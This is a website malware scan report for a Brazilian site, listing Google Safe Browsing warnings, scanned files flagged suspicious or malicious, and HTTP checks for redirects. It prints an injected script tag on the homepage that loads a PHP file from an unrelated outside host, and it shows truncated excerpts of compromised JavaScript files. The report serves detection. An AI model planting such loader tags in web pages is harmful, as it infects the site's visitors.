Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=flyinghorse.com.br
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://flyinghorse.com.br/ | 200 OK Content-Length: 4945 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://cvjm-wetzlar.de/whflfcrv.php?id=2110999"></script> | ||
http://flyinghorse.com.br/jquery.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://flyinghorse.com.br/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://flyinghorse.com.br/jquery-ui.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://flyinghorse.com.br/easyTooltip.js | 200 OK Content-Length: 9135 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('');
document.write(''); (function($) { $.fn.easyTooltip = function(options){ var defaults = { xOffset: 10, yOffset: 25, tooltipId: "easyTooltip", clickRemove: false, content: "", useElement: "" }; var options = $.extend(defaults, options); var content; this.each(function() { var title = $(this).attr("ti /*/81a338*/ Antivirus reports:
| ||
http://flyinghorse.com.br/site.js | 200 OK Content-Length: 15247 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('');
document.write(''); $(document).ready(function(){ var atual = $('#tela2'); var controle = true; $('#logo').fadeIn(1000); $("#imagem-logo").effect("bounce",{direction:'left',times:10},50); $('#imagem-logo').mouseenter(function(){ dir = Math.random(); if(dir<0.3){$("#imagem-logo").effect("bounce",{direction:'up',distance:5,times:3},100); } else if(dir<0.7){$("#imagem-logo").effect("bounce", /*/81a338*/ Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: flyinghorse.com.br
Result:
HTTP/1.1 200 OK
Date: Sun, 01 Mar 2015 08:03:19 GMT
Server: Microsoft-IIS/6.0
Content-Length: 4945
Content-Type: text/html
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
...4945 bytes of data.
GET / HTTP/1.1
Host: flyinghorse.com.br
Result:
HTTP/1.1 200 OK
Date: Sun, 01 Mar 2015 08:03:19 GMT
Server: Microsoft-IIS/6.0
Content-Length: 4945
Content-Type: text/html
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
...4945 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: flyinghorse.com.br
Referer: http://www.google.com/search?q=flyinghorse.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: flyinghorse.com.br
Referer: http://www.google.com/search?q=flyinghorse.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.